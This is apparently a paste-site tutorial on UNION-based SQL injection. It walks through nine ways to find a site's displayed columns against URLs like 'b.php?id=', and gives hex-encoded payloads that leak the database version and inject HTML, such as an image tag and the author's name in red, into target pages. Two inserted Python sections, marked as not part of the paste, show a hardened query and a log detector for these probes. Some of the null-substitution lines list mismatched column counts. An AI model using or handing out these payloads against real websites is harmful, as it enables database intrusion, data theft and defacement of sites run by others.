beginnerghost

Untitled

Feb 26th, 2019
How to find Vulnerable Columns?
ANS:-
1st Technique:-
use -> id = -1 union select 1,2,3,4,5--
use -> id = 1111/9999/null/bybysql union select 1,2,3,4,5--
use -> id = .1/1.2/12.4 union select 1,2,3,4,5-- [Thanks to Crown sir]

Note:- I use null and bybysql. Don't be confused by them; you can use whatever you like, meaning use things which don't exist [Thanks to Hack Forum]

2nd Technique :- False Parameter
Here False Parameter means putting something into our SQL parameter that produces a false result, like
(a) 1=2, 1=0
use -> id=1 or 1=2 union select 1,2,3,4,5--
use -> id=1 or 1=0 union select 1,2,3,4,5--

(b) We can also use having, like, <>
use -> id=1 having/HAVING 1=2 union select 1,2,3,4,5--
use -> id=1 1 like/LIKE 2 union select 1,2,3,4,5--
use -> id=1 1 <> 1 union select 1,2,3,4,5--
use -> id=1 {having/and} 1 like 2 union select 1,2,3,4,5--
use -> id=1 {having/and} 1 <> 1 union select 1,2,3,4,5-- /* use either having or and

(c) You can also use an and false/AND FALSE statement
use -> id=1 and false union select 1,2,3,4,5--

3rd Technique :- Divide by 0 means -> /0 and +div+0
use -> id =12/0 union select 1,2,3,4,5--

use -> id = 12+div+0+ union select 1,2,3,4,5--

4th Technique :- Look closely, or scratch the HTML source code

The number can potentially be displayed anywhere. When it is hard to spot, just change the query to make the whole thing more visible, to something like

http://somesite.net/b.php?id=12/0 union select 1111,2222,3333,4444,5555--

Above we use 1111, 2222 instead of 1, 2 respectively

After writing that query, open the page source, then search for the 'Column Number' like 1111,2222,3333,4444,5555 (CTRL+F :- for finding something in the source code). Then check where that number appears in the source code

Sometimes the number is displayed in the page title.

When you get the vulnerable columns, you then want to make the version, user, database or some HTML parts visible on the page. So for that follow these steps :-

i.) id = -1 union select 1111,2222,concat(0x223e,@@version,0x3c696d67207372633d22),4444--
Where
223e => ">
3c696d67207372633d22 => <img src="
*Remember we use 0x so that the above hex code works

ii.) To print our name
id = -1 union select 1111,2222,concat(0x5c223e3c666f6e7420636f6c6f72203d207265642073697a653d343e41414b4153483c2f666f6e743e3c212d2d),4444--
Where
0x5c223e3c666f6e7420636f6c6f72203d207265642073697a653d343e41414b4153483c2f666f6e743e3c212d2d => \"><font color = red size=4>AAKASH</font><!--
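
Why the marker numbers come back in the page, and the three controls that stop it, as an added example that is not part of the original paste. It uses Python with an in-memory SQLite table standing in for the database behind b.php; the table, its columns and the function names are assumptions, and only the probe string is taken from the text above.

```python
import html
import re
import sqlite3

# Probe string quoted in the 4th technique; everything else is constructed.
PROBE = "12/0 union select 1111,2222,3333,4444,5555--"

def make_db():
    """In-memory table standing in for the database behind b.php."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE posts (id, title, author, body, tags)")
    db.execute("INSERT INTO posts VALUES"
               " (12, 'Hello', 'ann', 'First post', 'misc')")
    return db

def render(rows, escape):
    # Only columns 2 and 4 reach the HTML: these are the "vulnerable columns".
    # Column 2 sits inside an attribute, the context that 0x223e ("> ) targets.
    enc = html.escape if escape else str
    return "".join(f'<h1 title="{enc(str(r[1]))}">{enc(str(r[3]))}</h1>'
                   for r in rows)

def page_vulnerable(db, raw_id):
    # Request text is spliced into the statement. In SQLite 12/0 is NULL, so the
    # real row drops out and the UNION literals come back as the only row.
    sql = ("SELECT id, title, author, body, tags FROM posts"
           f" WHERE id = {raw_id}")
    return render(db.execute(sql).fetchall(), escape=False)

def page_hardened(db, raw_id):
    # 1) Type check: an id is a short run of ASCII digits, nothing else.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return None  # caller answers 400 Bad Request
    # 2) Bound parameter: the value cannot change the shape of the statement.
    rows = db.execute("SELECT id, title, author, body, tags FROM posts"
                      " WHERE id = ?", (int(raw_id),)).fetchall()
    # 3) Output encoding: markup in a returned value stays inert text.
    return render(rows, escape=True)

if __name__ == "__main__":
    db = make_db()
    print(page_vulnerable(db, PROBE))
    print(page_hardened(db, PROBE))
    print(render([(0, '">', "", '<img src="', "")], escape=True))
```

The bound parameter is the control that closes the injection; the type check and the output encoding limit what a missed code path or a poisoned stored value can do.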

5th Technique :-
If you tried all the above techniques but still can't get the vulnerable column, then you can also use this 5th technique. What's new in this technique? See :-

you can write union select 1,2,3,4,5-- as union (select 1,2,3,4,5)--
use :- id=-2 union (select 1,2,3,4,5)--
/* If you see a vulnerable column like 3 then

use :- id=-2 union (select 1,2,333(4 check)/@@version,4,5)--

6th Technique :- True Parameter

use -> id=1 +where+1=1 union select 1,2,3,4,5--
use -> id=1 +and+50=50 union select 1,2,3,4,5--
use -> id=1 =75=75 union select 1,2,3,4,5--

7th Technique :- Bruteforcing the column /* Thanks to My Master Devilhunter Dante
Friends, when you can't find the number of columns, you can also use this technique. With this technique you not only find the number of columns, you also get the vulnerable columns.
Follow these steps
1st do -> union select 1--
2nd do -> union select 1,2--
3rd do -> union select 1,2,3--
4th do -> union select 1,2,3,4--
5th do -> union select 1,2,3,4,5--

Repeat the steps above until you get the vulnerable columns :)
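
What this probing looks like from the server side, as an added example that is not part of the original paste: a small detector that flags UNION SELECT probes made only of numbers or NULL and spots the column count-up of the 7th technique. The log format, IP addresses and function names are constructed for illustration; quoted-string and function-call variants (8th technique) are outside what this pattern matches.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# UNION [ALL] SELECT (optionally parenthesised) whose column list is made only
# of integers/NULL and runs up to the comment or closing bracket.
UNION_PROBE = re.compile(
    r"\bunion\s+(?:all\s+)?\(?\s*select\s+"
    r"((?:null|\d+)(?:\s*,\s*(?:null|\d+))*)(?=\s*(?:--|#|\)|$))", re.I)
# Prefixes that make the legitimate row drop out (techniques 1 to 3).
SUPPRESS = re.compile(r"^\s*-\d+|\b(?:and|or|having)\s+(?:false|1\s*=\s*[02])"
                      r"|/\s*0\b|\bdiv\s+0\b", re.I)

# Constructed sample, "<client-ip> <request-uri>"; IPs are documentation ranges.
SAMPLE_LOG = [
    "198.51.100.7 /b.php?id=12",
    "203.0.113.9 /b.php?id=-1+union+select+1--",
    "203.0.113.9 /b.php?id=-1+union+select+1,2--",
    "203.0.113.9 /b.php?id=-1+union+select+1,2,3--",
    "203.0.113.9 /b.php?id=12/0+union+select+1111,2222,3333,4444,5555--",
    "203.0.113.9 /b.php?id=-2+union+(select+1,2,3,4,5)--",
    "198.51.100.7 /search.php?q=student+union+select+committee",
]

def longest_run(nums):
    """Length of the longest run of consecutive integers in nums."""
    best = run = 0
    prev = None
    for n in sorted(nums):
        run = run + 1 if prev is not None and n == prev + 1 else 1
        best, prev = max(best, run), n
    return best

def analyze(log_lines):
    """Return (findings, clients_enumerating_column_count)."""
    findings, seen = [], defaultdict(set)
    for line in log_lines:
        ip, uri = line.split(" ", 1)
        for name, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
            m = UNION_PROBE.search(value)
            if not m:
                continue
            cols = m.group(1).count(",") + 1
            seen[(ip, name)].add(cols)
            findings.append({"ip": ip, "param": name, "columns": cols,
                             "row_suppressed": bool(SUPPRESS.search(value))})
    # Three or more consecutive column counts from one client on one parameter.
    enumerating = sorted(k for k, v in seen.items() if longest_run(v) >= 3)
    return findings, enumerating

if __name__ == "__main__": print(*analyze(SAMPLE_LOG), sep="\n")
```

The benign search for "student union select committee" is not flagged, because the pattern requires a numeric or NULL column list after SELECT.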

8th Technique :- Guessing which number is vulnerable
Suppose we have union select 1,2,3,4,5,6,7--
Then replace the numbers with any words you want, like :-
union select 'hello1','hello2','hello3','hello4','hello5' [Then convert 'hello1' to hex format] OR
union select version(),version(),version(),version(),version() [No need to convert] OR
union select :1,:2,:3,:4,:5,:6 [Then convert :1 to hex format. I think it is very easy to use and not confusing ]

9th Technique :- Using null
Friends, we can also use null to get the vulnerable columns.
See this :-
union select 1,2,3,4,5,6,7--
union select null,2,3,4,5,6,7-- Error [But if 1 is vulnerable then no error]
union select 1,null,2,3,4,5,6,7-- Error "
union select 1,2,null,3,4,5,6,7-- Error "
union select 1,2,3,null,4,5,6,7-- No Error [Suppose if 4 is vulnerable then no error]
union select 1,2,3,4,null,5,6,7--
union select 1,2,3,4,5,null,6,7--
union select 1,2,3,4,5,null,7--
union select 1,2,3,4,5,6,null --

Thanks and credit goes to
1. Blackhawk
2. Crown
3. BlackRoas
4. Benzi
5. Devilhunter Dante (My Teacher)